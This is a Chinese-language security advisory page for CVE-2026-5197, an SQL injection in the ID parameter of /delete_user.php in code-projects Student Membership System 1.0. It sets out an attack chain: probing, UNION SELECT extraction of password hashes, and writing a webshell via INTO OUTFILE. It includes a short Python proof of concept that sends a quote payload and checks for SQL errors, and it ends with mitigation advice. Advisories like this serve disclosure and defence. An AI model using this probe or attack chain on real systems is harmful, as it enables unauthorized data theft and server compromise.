IPBUF安全漏洞报告
English
CVE-2026-5197 CVSS 6.3 中危

CVE-2026-5197 Student Membership System SQL注入漏洞

披露日期: 2026-03-31

漏洞信息

漏洞编号
CVE-2026-5197
漏洞类型
SQL注入
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
code-projects Student Membership System

相关标签

SQL注入CVE-2026-5197Student Membership SystemWeb安全

漏洞概述

该漏洞存在于 code-projects Student Membership System 1.0 版本中。具体受影响的文件是 /delete_user.php。由于对 ID 参数缺乏适当的过滤,攻击者可以通过操纵该参数实施 SQL 注入攻击。此漏洞可被远程利用,可能导致数据库信息泄露、数据篡改或服务器权限提升。

技术细节

漏洞根源在于 /delete_user.php 文件在处理用户请求时,未对传入的 'ID' 参数进行充分的输入验证和过滤,直接将其拼接到 SQL 查询语句中。攻击者可以构造恶意的 SQL 语句(如 UNION SELECT 或基于布尔/时间的盲注语句)作为 ID 参数的值发送给服务器。当服务器执行该查询时,恶意 SQL 语句会被数据库引擎解析执行,从而绕过认证或提取敏感数据。由于 CVSS 向量显示无需用户交互且攻击复杂度低,该漏洞极易被自动化工具扫描利用。

攻击链分析

STEP 1
1. 信息收集
攻击者通过网络扫描发现运行 code-projects Student Membership System 1.0 的目标服务器。
STEP 2
2. 漏洞探测
攻击者向目标的 /delete_user.php 端点发送特制的 HTTP POST/GET 请求,在 ID 参数中注入单引号或特定的 SQL 语法,观察服务器响应是否包含数据库错误信息。
STEP 3
3. 漏洞利用
确认漏洞存在后,攻击者构造更复杂的 SQL 语句(如 UNION SELECT),提取数据库中的用户名、密码哈希等敏感数据,或通过 INTO OUTFILE 写入 WebShell。
STEP 4
4. 后渗透
利用获取的凭证或 WebShell 进一步控制服务器,提升权限或横向移动。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def verify_sqli(url): """ PoC for CVE-2026-5197 Target: /delete_user.php Parameter: ID """ target = f"{url}/delete_user.php" # Payload to test basic SQL injection syntax error payload = { "ID": "1'" } try: response = requests.post(target, data=payload, timeout=5) # Checking for SQL syntax error in response (common in simple apps) if "syntax error" in response.text or "mysql_fetch" in response.text: print("[+] Vulnerability Detected: SQL Injection found.") else: print("[-] Vulnerability not detected or error message filtered.") except Exception as e: print(f"[!] Request failed: {e}") if __name__ == "__main__": target_url = "http://example.com" # Replace with actual target verify_sqli(target_url)

影响范围

code-projects Student Membership System 1.0

防御指南

临时缓解措施
在未升级补丁前,建议通过 Web 应用防火墙(WAF)添加针对 /delete_user.php 的 SQL 注入防护规则,并在服务器端限制对该文件的直接访问权限。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表